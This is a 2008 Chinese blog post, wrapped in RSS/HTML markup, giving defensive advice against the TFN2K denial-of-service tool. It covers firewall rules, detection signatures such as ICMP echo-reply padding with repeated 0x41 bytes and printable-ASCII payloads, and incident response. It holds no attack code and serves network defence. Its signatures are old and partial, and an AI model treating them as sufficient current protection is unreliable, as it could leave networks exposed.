<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 目前仍没有能有效防御TFN2K拒绝服务攻击的方法。最有效的策略是防止网络资源被用作客户端或代理端。</font></p>
<br>
<p><font face="Times New Roman" size=3>预 防</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 只使用应用代理型防火墙。这能够有效地阻止所有的TFN2K通讯。但只使用应</font></p>
<br>
<p><font face="Times New Roman" size=3>用代理服务器通常是不切合实际的，因此只能尽可能使用最少的非代理服务。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 禁止不必要的ICMP、TCP和UDP通讯。特别是对于ICMP数据，可只允许ICMP类</font></p>
<br>
<p><font face="Times New Roman" size=3>型3（destination unreachable目标不可到达）数据包通过。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 如果不能禁止ICMP协议，那就禁止主动提供或所有的ICMP_ECHOREPLY包。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 禁止不在允许端口列表中的所有UDP和TCP包。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 配置防火墙过滤所有可能的伪造数据包。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 对系统进行补丁和安全配置，以防止攻击者入侵并安装TFN2K。</font></p>
<br>
<p><font face="Times New Roman" size=3>监 测</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 扫描客户端/守护程序的名字。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 根据前面列出的特征字符串扫描所有可执行文件。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 扫描系统内存中的进程列表。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 检查ICMP_ECHOREPLY数据包的尾部是否含有连续的0x41。另外，检查数据侧</font></p>
<br>
<p><font face="Times New Roman" size=3>面内容是否都是ASCII可打印字符（2B，2F-39，0x41-0x5A，0x61-0x7A）。</font></p>
<br>
<p><font face="Times New Roman" size=3>◆ 监视含有相同数据内容的连续数据包（有可能混合了TCP、UDP和ICMP包）。</font></p>
<br>
<p><font face="Times New Roman" size=3>响 应</font></p>
<br>
<p><font face="Times New Roman" size=3>&nbsp;&nbsp;&nbsp; 一旦在系统中发现了TFN2K，必须立即通知安全公司或专家以追踪入侵进行。因为TFN2K的守护进程不会对接收到的命令作任何回复，TFN2K客户端一般会继续向代理端主机发送命令数据包。另外，入侵者发现攻击失效时往往会试图连接到代理端主机上以进行检查。这些网络通讯都可被追踪。</font></p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/45844.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2008-06-18 13:18 <a href="http://www.cnitblog.com/chenxin9821/articles/45844.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>